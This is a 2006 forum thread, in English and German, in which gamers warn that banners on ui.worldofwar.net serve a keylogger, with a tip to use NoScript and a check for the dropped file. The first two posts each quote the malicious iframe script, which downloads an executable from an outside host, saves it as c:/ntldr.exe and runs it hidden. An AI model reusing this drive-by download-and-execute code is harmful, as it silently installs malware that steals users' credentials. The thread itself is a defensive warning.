Worldofwar.net

12/20/2006 21:22 Tashi#1
Heads up guys. Another keylogger on the site has been signilated, once more - in the banners.

P.S.: People that use Mozilla/Firefix might want to keep an eye out for the extention called "NoScript" - quite handy to block these kind of keyloggers. Link: [Only registered and activated users can see links. Click Here To Register...]

Code:
 At this moment in time, there is a keylogger embedded into the ui.worldofwar.net homepage.

The keylogger itself is in an iframe embedded from hxxp://ui.bcegame.com/pps.exe (do not visit!).

Do not under any circumstances visit ui.worldofwar.net !

The actual keylogger iframe:
hxxp://ui.bcegame.com/wm.htm

Keylogger iframe src:


xPost.Open('GET','httxxxp://ui.bcegame.com/pps.exe',0);
xPost.Send();
var sGet=df.CreateObject('ADODB.Stream','');
sGet.Mode=3;
sGet.Type=1;
sGet.Open();
sGet.Write(xPost.ResponseBody);
sGet.SaveToFile('c:/ntldr.exe',2);
var x = df.CreateObject('wscript.shell','');
x.run'c:/ntldr.exe',0);
Quickcheck if you have the keylogger, look for the file 'ntldr.exe' in your C:

(source: [Only registered and activated users can see links. Click Here To Register...])
12/21/2006 01:36 <GM>[Dobermann]#2
also ich klick da nicht drauf....


Edit paar Minuten später:

habs gefunden wo er es her hat ^^

Wie man dem englischen Forum entnehmen kann ( Original-Link: [Only registered and activated users can see links. Click Here To Register...] befindet sich auf der Seite http : // ui . worldofwar . net erneut ein Keylogger.


Der Keylogger selbst ist mittels Iframe von http : // ui . bcegame . com / pps . exe eingebunden (Geht bitte nicht auf diese Seite!) - Desweiteren solltet ihr vermeiden, ui . worldofwar . net zu besuchen, wenn euch euer Account lieb ist.


Sourcecode

xPost.Open('GET','httxxxp://ui.bcegame.com/pps.exe',0);
xPost.Send();
var sGet=df.CreateObject('ADODB.Stream','');
sGet.Mode=3;
sGet.Type=1;
sGet.Open();
sGet.Write(xPost.ResponseBody);
sGet.SaveToFile('c:/ntldr.exe',2);
var x = df.CreateObject('wscript.shell','');
x.run('c:/ntldr.exe',0);


steht in den allgemeinen blizzard foren [Only registered and activated users can see links. Click Here To Register...]

:bandit:
12/21/2006 05:41 Sui2k#3
er hatte doch seine quelle angegeben, wieso postest du den das gleiche nochma?? etwas sinnfrei oda..
12/21/2006 20:33 USB Schnittstelle#4
Quote:
Originally posted by SuI2k@Dec 21 2006, 05:41
er hatte doch seine quelle angegeben, wieso postest du den das gleiche nochma?? etwas sinnfrei oda..
Er hat es für die übersetzt, die nichtmal genug Englischkentnisse besitzen um die Farmguides von Joana trotz Videos zu benutzen.

Nein, du bist nicht gemeint ;)
12/22/2006 14:22 feareh#5
danke wieder :|

so viele viruses
wtf :(
12/22/2006 15:18 Apfel#6
Quote:
Originally posted by feareh@Dec 22 2006, 14:22
so viele viruses
Sry aber das heißt Viren